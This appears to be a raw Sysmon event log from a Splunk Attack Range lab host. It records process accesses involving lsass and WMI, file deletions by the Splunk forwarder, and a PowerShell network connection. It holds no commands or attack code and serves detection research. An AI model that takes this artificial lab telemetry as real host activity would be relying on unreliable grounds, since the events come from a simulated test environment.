21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.151{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.135{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.135{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.135{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.104{B81B27B7-4013-611D-1600-00000000C801}11966212C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.104{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.088{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.088{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82EC-613A-BD96-03000000C801}6736C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.067{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.067{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.067{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:57.939{B81B27B7-4013-611D-1600-00000000C801}11962324C:\Windows\system32\svchost.exe{B81B27B7-82ED-613A-BF96-03000000C801}4360C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:57.924{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82ED-613A-BF96-03000000C801}4360C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:57.908{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82ED-613A-BF96-03000000C801}4360C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:57.908{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-82ED-613A-BF96-03000000C801}4360C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:57.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=516D00979AC8E0C1C0334204657A353C,SHA256=74E1B392EBEF35B5A162223216D35000E7B4E557B5EE7B20A73A3032507B7558,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:57.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06CE13315C9928CD99F6A740962E1234,SHA256=EDA0813B022E79209F8F9C8BBB01BC5B7002298C8CD5BE0918A763A6B8E38E39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:57.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FB1F1EA4CAD34A16AE30149DC572313,SHA256=A4F99A96CBE8D44A9E0D4A0B023F5946218AE7AF2E6ACBC0E766A30984A63851,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:58.923{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=516D00979AC8E0C1C0334204657A353C,SHA256=74E1B392EBEF35B5A162223216D35000E7B4E557B5EE7B20A73A3032507B7558,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:58.223{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E3DE2A1E7E5FD5FFADD36404EA26F765,SHA256=8BB9B6B8F60D6E3CBF0BEED302CD9DE66225B2EDCCCA1E9903CA2A8622C2B86A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:58.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB2D1B17228DE011688A2716C248FD08,SHA256=B17CD0DC9DF58EEA8878030F0B03FE7B050898F5B88D6ABDA6BC7AEF2D0FA282,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:24.303{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62082-false10.0.1.12-8000- 354300x800000000000000035127893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:23.400{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62081-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:59.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04DADD36198B58AC9D4F83EB20D9B4B7,SHA256=F4AEA6AF72F7374C7FDDC8DE12D5F66CCC6B5F223A1D5A974073912D4B1A349C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:00.206{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD5B8AAA464FB3F064FB2871810BC5E7,SHA256=AD42E71A6F20537E71189AA2A933F84BBA52B798CAEF06A643BC85D2E52951EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:00.006{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:01.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D99BF701F268F4B3091660D4B2BBF364,SHA256=41892B6569F94E0CDAA7C83046CDEF3A95061228609E4CC0FD98A0156AC14EB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:02.251{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62ECC0F43A6DAE5C89190C806F13A45B,SHA256=9818AF5EC4D5DF3C272990B6B886A28FE67E8290C23794D35B0AFED6B0EC98BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.181{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62083-false10.0.1.12-8089- 